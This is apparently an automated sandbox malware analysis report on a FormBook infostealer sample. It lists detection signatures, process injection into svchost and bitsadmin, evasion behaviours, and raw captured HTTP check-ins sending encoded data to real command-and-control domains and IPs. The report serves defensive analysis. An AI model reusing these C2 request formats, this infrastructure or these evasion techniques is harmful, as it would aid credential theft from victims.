Edit tour

Windows Analysis Report
WyGagXWAfb.exe

Overview

General Information

Sample name:	WyGagXWAfb.exe renamed because original name is a hash value
Original sample name:	0c9998720cc90e23ce1bd5b4f7ed512316027625ccea7eca9722a32557a54adb.exe
Analysis ID:	1587993
MD5:	6b53e14ca62426ef8a60d4a62a16a12b
SHA1:	c1f76d7381f85f03d3ffce11ce6cb6ef9d225d38
SHA256:	0c9998720cc90e23ce1bd5b4f7ed512316027625ccea7eca9722a32557a54adb
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

WyGagXWAfb.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\WyGagXWAfb.exe" MD5: 6B53E14CA62426EF8A60D4A62A16A12B)

svchost.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\WyGagXWAfb.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

bmHwSvjHTinzr.exe (PID: 3428 cmdline: "C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

bitsadmin.exe (PID: 3332 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)

firefox.exe (PID: 1228 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2254547602.00000000031F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2925411607.0000000000880000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2925122303.00000000009C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2254014316.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2925743661.0000000002F80000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2924526490.0000000000130000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2255001512.0000000004400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2924737700.0000000000620000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Mozilla Firefox\firefox.exe, NewProcessName: C:\Program Files\Mozilla Firefox\firefox.exe, OriginalFileName: C:\Program Files\Mozilla Firefox\firefox.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 3332, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", ProcessId: 1228, ProcessName: firefox.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\WyGagXWAfb.exe", CommandLine: "C:\Users\user\Desktop\WyGagXWAfb.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WyGagXWAfb.exe", ParentImage: C:\Users\user\Desktop\WyGagXWAfb.exe, ParentProcessId: 6968, ParentProcessName: WyGagXWAfb.exe, ProcessCommandLine: "C:\Users\user\Desktop\WyGagXWAfb.exe", ProcessId: 7116, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\WyGagXWAfb.exe", CommandLine: "C:\Users\user\Desktop\WyGagXWAfb.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WyGagXWAfb.exe", ParentImage: C:\Users\user\Desktop\WyGagXWAfb.exe, ParentProcessId: 6968, ParentProcessName: WyGagXWAfb.exe, ProcessCommandLine: "C:\Users\user\Desktop\WyGagXWAfb.exe", ProcessId: 7116, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:18:28.466784+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49807	81.169.145.72	80	TCP
2025-01-10T20:18:51.870906+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49953	216.40.34.41	80	TCP
2025-01-10T20:19:13.621410+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50010	3.33.130.190	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:18:44.273584+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49904	216.40.34.41	80	TCP
2025-01-10T20:18:47.031565+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49921	216.40.34.41	80	TCP
2025-01-10T20:18:49.432901+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49937	216.40.34.41	80	TCP
2025-01-10T20:19:05.975750+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50007	3.33.130.190	80	TCP
2025-01-10T20:19:08.533539+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50008	3.33.130.190	80	TCP
2025-01-10T20:19:11.128177+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50009	3.33.130.190	80	TCP
2025-01-10T20:19:19.654257+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50011	103.249.106.91	80	TCP
2025-01-10T20:19:22.195557+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50012	103.249.106.91	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: WyGagXWAfb.exe	Virustotal: Detection: 63%			Perma Link
Source: WyGagXWAfb.exe	ReversingLabs: Detection: 68%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2254547602.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2925411607.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925122303.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2254014316.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925743661.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924526490.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2255001512.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924737700.0000000000620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: WyGagXWAfb.exe

Joe Sandbox ML: detected

Source: WyGagXWAfb.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: bitsadmin.pdb source: svchost.exe, 00000001.00000003.2222651208.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2222769442.0000000002C48000.00000004.00000020.00020000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000003.2332781700.000000000080F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000001.00000003.2222651208.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2222769442.0000000002C48000.00000004.00000020.00020000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000003.2332781700.000000000080F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bmHwSvjHTinzr.exe, 00000005.00000000.2173688723.000000000031E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: WyGagXWAfb.exe, 00000000.00000003.1697975405.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, WyGagXWAfb.exe, 00000000.00000003.1702619340.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2254591162.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156144226.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2254591162.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2158058330.0000000003100000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000C7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2254436134.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2257012523.0000000000933000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WyGagXWAfb.exe, 00000000.00000003.1697975405.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, WyGagXWAfb.exe, 00000000.00000003.1702619340.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2254591162.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156144226.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2254591162.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2158058330.0000000003100000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000C7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925589029.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2254436134.0000000000787000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2257012523.0000000000933000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.000000000664C000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2924787336.0000000000692000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2558170821.000000001663C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.000000000664C000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2924787336.0000000000692000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2558170821.000000001663C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B74696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B74696
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B7C9C7
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7C93C FindFirstFileW,FindClose,	0_2_00B7C93C
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7F200
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B7F35D
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7F65E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B73A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B73A2B
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B73D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B73D4E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B7BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B7BF27

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49807 -> 81.169.145.72:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49904 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49921 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49937 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 103.249.106.91:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49953 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 103.249.106.91:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.8066642.xyz

Source: Joe Sandbox View	IP Address: 81.169.145.72 81.169.145.72
Source: Joe Sandbox View	IP Address: 103.249.106.91 103.249.106.91

Source: Joe Sandbox View	ASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
Source: Joe Sandbox View	ASN Name: ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B825E2

Source: global traffic	HTTP traffic detected: GET /3cb8/?28=ytMd5JoNDlp2jn5Pf080ZLd4stN1vAS6iwQxmGOCcgQqtWeYidPwJokyLIn5bfhZSz6tk8SdxwqnTJTPUhj5Hm4EFHb2t6dUrPwKRW7fy+YL2chtEAutPD0=&D48D=_fRxbHzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bonsai-stbg.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1
Source: global traffic	HTTP traffic detected: GET /lqx0/?28=ZcGFFFKPGpOKzuYlH0bTDaS6hCz3KyeMWvADo2w+EgPOJwiUlM35Knpfqh5LnbTmzp8Goxw1RSHUITR6WsGKOKvYVALk7yp6HMgY36QA1UuvockXGPvJZD8=&D48D=_fRxbHzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sweetspotfitness.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1
Source: global traffic	HTTP traffic detected: GET /69j2/?28=dLOf+4bthJ/u4c08U69ej48CCJnyAN8IrfKExSjlwiubv1BfPs9ejhiJo6s9NxKGEEo4eBxOiQfre4OpkQEfwraiUJhkrXAG1cZ+G+Id5d1uI+fzBgJa19I=&D48D=_fRxbHzp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.virtusign.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1

Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.bonsai-stbg.info
Source: global traffic	DNS traffic detected: DNS query: www.sweetspotfitness.net
Source: global traffic	DNS traffic detected: DNS query: www.sortsport.shop
Source: global traffic	DNS traffic detected: DNS query: www.virtusign.info
Source: global traffic	DNS traffic detected: DNS query: www.8066642.xyz

Source: unknown

HTTP traffic detected: POST /lqx0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.sweetspotfitness.netCache-Control: no-cacheContent-Length: 199Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.sweetspotfitness.netReferer: http://www.sweetspotfitness.net/lqx0/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1Data Raw: 32 38 3d 55 65 75 6c 47 79 65 73 4a 4d 4b 7a 31 65 6f 6e 66 56 36 6f 4e 4a 79 48 70 43 76 54 49 48 7a 34 57 59 6c 72 69 6d 77 37 48 68 2b 38 47 42 43 61 38 76 37 62 42 33 68 34 6e 32 64 6d 76 49 4c 47 31 74 4a 53 75 6d 55 35 41 52 32 36 66 51 39 4f 47 2b 48 57 47 73 6a 30 59 32 57 51 31 7a 68 47 50 2b 55 33 34 49 38 53 37 56 44 44 77 62 63 6b 48 73 4c 74 46 78 70 50 6f 6a 4b 32 65 53 4a 6b 5a 2f 63 38 70 6d 36 30 6c 58 36 59 30 75 42 67 70 4a 2b 68 4e 44 62 70 6a 6d 67 2f 79 32 38 58 62 6b 6a 37 67 47 50 38 78 54 68 43 62 70 4c 48 44 45 61 56 39 42 67 6e 4f 66 59 55 31 55 49 41 6e 67 3d 3d Data Ascii: 28=UeulGyesJMKz1eonfV6oNJyHpCvTIHz4WYlrimw7Hh+8GBCa8v7bB3h4n2dmvILG1tJSumU5AR26fQ9OG+HWGsj0Y2WQ1zhGP+U34I8S7VDDwbckHsLtFxpPojK2eSJkZ/c8pm60lX6Y0uBgpJ+hNDbpjmg/y28Xbkj7gGP8xThCbpLHDEaV9BgnOfYU1UIAng==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:18:28 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
